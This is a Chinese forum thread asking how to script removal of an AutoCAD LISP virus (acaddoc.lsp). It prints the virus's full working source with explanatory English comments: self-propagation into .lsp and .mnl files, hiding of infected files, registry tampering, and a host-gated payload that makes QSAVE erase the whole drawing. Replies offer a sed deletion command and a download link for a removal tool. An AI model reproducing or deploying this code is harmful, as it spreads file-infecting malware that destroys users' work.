标题: [文件操作] 批处理怎样清除cad病毒?
作者: ftmm 时间: 2011-4-9 22:34 标题: 批处理怎样清除cad病毒?
以下是cad病毒代码,原文件名字叫做:acaddoc.lsp。当它与dwg文件放在一起时,autocad打开dwg文件,病毒就会被执行,感染lsp文件和mnl文件;这两个文件都是以文本方式保存的。
我想请教一下,我想做一个bat来清除这个病毒,而不是简单的删除。我的思路是这样,列举出硬盘的mnl文件和lsp文件。大于200k的直接删除。
然后把剩下的mnl文件和lsp文件与以下代码对比,把相同的部分删除。以(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
为开头,最后的jjyy为结尾,中间部分清除。请问有什么思路?
我简化了一下思路,就是找到“(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
”字符串,把这个字符串以后的所有内容都删除,怎么做?用sed?
;; s::startup is evaluated automatically when AutoCAD loads this acaddoc.lsp
;; next to a drawing. It is the infector's entry point; the comments below
;; describe what each step does so the three infection targets and the
;; registry changes can be located and reverted during cleanup.
(defun s::startup (/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)
(vl-load-com)
(setvar "cmdecho" 0)
(setvar "filedia" 1)
;; Three writes under HKLM\...\Explorer\Advanced\Folder\Hidden zero the
;; SHOWALL CheckedValue and the NOHIDDEN CheckedValue/DefaultValue.
;; Combined with the hidden attribute that attset applies to infected
;; files, this presumably keeps them from showing in Explorer even when
;; "show hidden files" is selected. A cleanup should restore these values
;; (on a stock install SHOWALL CheckedValue is 1 and both NOHIDDEN values
;; are 2 -- verify against a clean machine before scripting it).
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"CheckedValue"
0
)
(vl-registry-write
"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\NOHIDDEN"
"DefaultValue"
0
)
;; mnlpth: path of the current menu file (MENUNAME); dwgpre: directory of
;; the open drawing (DWGPREFIX). Both are used only to build target paths.
(setq mnlpth (getvar "menuname"))
(setq dwgpre (getvar "dwgprefix"))
;; If an acaddoc.lsp is found on the support path it becomes the source
;; (doclsp) and is appended into three targets via chklsp:
;;   <menu path>doc.lsp, <menu path>.mnl and <drawing dir>\acaddoc.lsp.
;; These are the first places to check when cleaning an installation.
(if (setq doclsp (findfile "acaddoc.lsp"))
(progn (chklsp (strcat mnlpth "doc.lsp") doclsp)
(chklsp (strcat mnlpth ".mnl") doclsp)
(chklsp (strcat dwgpre "acaddoc.lsp") doclsp)
)
)
;; mac0 is an obfuscated integer list. mkgroup expands it into 500 lists
;; (each entry integer-divided by 1..500); one of them is compared against
;; the character codes of the first MAC address returned by macaddr.
;; (Dividing the entries by 47 gives printable ASCII in the shape of a
;; colon-separated MAC string -- a constructed check, confirm before use.)
(setq mac0
'(2256 2256 2726 2256 2585 2726 3243 2679
2726 2256 3149 2726 3196 3290 2726 2632
2397
)
)
;; The destructive payload (dolsp) is gated: CDATE must be after
;; 2009-09-09, the host's first MAC must match the decoded list, and
;; (fix (* 100 (- cdate (fix cdate)))) -- which appears to be the hour
;; field of CDATE -- must be even. The file infection above runs
;; unconditionally; only the command hijacking is host-specific.
(if (and (> (setq cdate (getvar "cdate")) 20090909)
(member (vl-string->list (car (macaddr))) (mkgroup mac0))
(= (rem (fix (* 100 (- cdate (fix cdate)))) 2) 0)
)
(dolsp)
)
(princ)
)
;; chklsp: infect target file fp1 with the contents of source file fp2.
;;   fp1 - path of the file to create or append to (doc.lsp, .mnl, acaddoc.lsp)
;;   fp2 - path of the acaddoc.lsp used as the source
;; If fp1 can be opened, every line is read and only the last one is kept
;; in tem2; unless that last line contains ";;;jjyy" (the end-of-infection
;; marker the thread refers to) the source is appended via writelsp.
;; If fp1 does not exist, writelsp creates it. Finally both files get
;; attribute 2 (FileSystemObject Hidden).
;; Cleanup note: only the LAST line is checked for the marker, so a file
;; whose tail was truncated or edited would be appended to again on the
;; next load; remove the whole block from the s::startup line to the marker.
(defun chklsp (fp1 fp2 / fp3 TEM1 TEM2)
(if (setq fp3 (open fp1 "r"))
(progn
(if
(not
(wcmatch (while (setq tem1 (read-line fp3)) (setq tem2 tem1))
"*;;;jjyy*"
)
)
(writelsp fp2 fp1)
)
(close fp3)
)
(writelsp fp2 fp1)
)
(attset fp1 2)
(attset fp2 2)
)
;; writelsp: copy every line of fp1 onto the end of fp2.
;;   fp1 - source file, opened for reading
;;   fp2 - destination file, opened in append ("a") mode
;; Because the destination is appended to, any legitimate content that was
;; already in fp2 stays in front of the injected code -- which is why
;; deleting from the s::startup line to end-of-file (as suggested later in
;; the thread) restores the original file. fp1 is assumed to exist; a nil
;; fp3 would make read-line fail.
(defun writelsp (fp1 fp2 / fp3 fp4 tem)
(setq fp3 (open fp1 "r")
fp4 (open fp2 "a")
)
(while (setq tem (read-line fp3)) (write-line tem fp4))
(close fp3)
(close fp4)
(princ)
)
;; attset: set the Windows file attributes of fp to code through
;; Scripting.FileSystemObject (GetFile -> Attributes). chklsp calls it
;; with code 2, the FileSystemObject Hidden attribute, so infected files
;; are hidden from a default Explorer view. When cleaning, clear the
;; hidden attribute (attrib -h) before or after removing the code.
;; Note: vlax-release-object is reached even when the if branch was
;; skipped and fp1 is still nil.
(defun attset (fp code / fp1)
(if (and (/= "" fp) code)
(progn (vl-load-com)
(vlax-put-property
(setq fp1 (vlax-invoke-method
(vlax-create-object "Scripting.FileSystemObject")
'GetFile
fp
)
)
'Attributes
code
)
)
)
(vlax-release-object fp1)
)
;; mkgroup: de-obfuscation helper. From the integer list pt0 build 500
;; lists, the k-th being pt0 with every element integer-divided by k
;; (AutoLISP / truncates on integers), returned in order k = 1..500.
;; s::startup tests whether the character-code list of the host's MAC
;; address is a member of this result. The loop counter i is not declared
;; local, so it leaks as a global symbol after the call.
(defun mkgroup (pt0 / pts)
(setq i 1)
(repeat 500
(setq pts (cons (mapcar '(lambda (x) (/ x i)) pt0) pts))
(setq i (1+ i))
)
(reverse pts)
)
;; macaddr: return the distinct MACAddress values of local network adapters
;; that have a NetConnectionID, in WMI query order (first element = first
;; such adapter). Uses wbemScripting.SwbemLocator -> ConnectServer "." ->
;; ExecQuery "Select * From Win32_NetworkAdapter". The first ConnectServer
;; attempt passes security flag 128 (appears to be the "use max wait"
;; flag -- confirm) and falls back to a plain call if that errors.
;; Defender note: a LISP file touching WMI for adapter MACs is itself a
;; useful signature; legitimate CAD macros rarely need it.
(defun macaddr (/ mac WMIobj con lox sn)
(vl-load-com)
(if (setq WMIobj (vlax-create-object "wbemScripting.SwbemLocator"))
(progn
(setq
con (vl-catch-all-apply
'vlax-invoke
(list WMIobj 'ConnectServer "." "" "" "" "" "" 128 nil)
)
)
(if (vl-catch-all-error-p con)
(setq
con (vlax-invoke WMIobj 'ConnectServer "." "" "" "" "" "")
)
)
(setq lox (vlax-invoke
con
'ExecQuery
"Select * From Win32_NetworkAdapter "
)
)
;; keep each MAC once, only for adapters with a connection name
(vlax-for i lox
(if (vlax-get i 'NetConnectionID)
(progn (setq sn (vlax-get i 'MACAddress))
(or (member sn mac) (setq mac (cons sn mac)))
)
)
)
(mapcar 'vlax-release-object (list lox con WMIobj))
)
)
(reverse mac)
)
;; dolsp: the host-gated payload. UNDEFINE removes the native QSAVE,
;; SAVEAS, WBLOCK, INSERT and PLINE commands so that the c:qsave,
;; c:saveas, c:wblock, c:insert and c:pline definitions below take over.
;; In a running session the originals can be restored with REDEFINE.
(defun dolsp ()
(command "undefine" "qsave")
(command "undefine" "saveas")
(command "undefine" "wblock")
(command "undefine" "insert")
(command "undefine" "pline")
)
;; c:qsave replacement: instead of saving, erases every object in the
;; drawing ((ssget "x") selects all). This is the data-destroying part
;; of the payload; it runs only after dolsp has undefined QSAVE.
(defun c:qsave ()
(command "_.erase" (ssget "x") "")
(princ)
)
;; c:saveas replacement: shows a "save drawing as" file dialog (prompt text
;; is Chinese) and then uses the chosen directory as a new infection target,
;; appending the support-path acaddoc.lsp into <chosen dir>\acaddoc.lsp via
;; chklsp. No drawing is actually saved -- the command only propagates the
;; infection. Any folder a user "saved" into should be checked.
(defun c:saveas (/ fp1)
(setq fp1 (getfiled "图形另存为" (getvar "dwgprefix") "dwg" 1))
(chklsp (strcat (vl-filename-directory fp1) "\\acaddoc.lsp")
(findfile "acaddoc.lsp")
)
(princ)
)
;; c:wblock replacement: does nothing, so WBLOCK silently stops working.
(defun c:wblock () (princ))
;; c:insert replacement: does nothing, so INSERT silently stops working.
(defun c:insert () (princ))
;; c:pline replacement: runs the plain LINE command in place of PLINE.
(defun c:pline () (command "_.line") (princ))
作者: ftmm 时间: 2011-4-9 23:20
大概有30行左右,请问如何删除?
作者: Batcher 时间: 2011-4-10 12:55
2# ftmm - sed -i "/(defun s::startup (\/ DOCLSP DWGPRE CDATE MAC0 MNLPTH)/,$d" a.txt
作者: batman 时间: 2011-4-10 12:57
请先不要问我们的思路,你自己先把思路理好讲清楚可以?
作者: wc726842270 时间: 2011-4-10 13:55
感觉少了很多的内容。
1。想了解一下这个病毒的传播方式是不是与注册表有关。
2。感觉上你的问题很多。“好像”是不仅仅在于删除吧,如果是能否给个1234……
3。能否在需要操作的头尾作个简单的处理呢?
PS:别忘了CODE啊
作者: wuhengsi 时间: 2014-10-21 00:57
文件名称:CAD病毒专杀工具V1.0
软件大小:1.9MB
下载地址:http://pan.baidu.com/s/1bnleIlT (2014-10-21 日最新下载地址)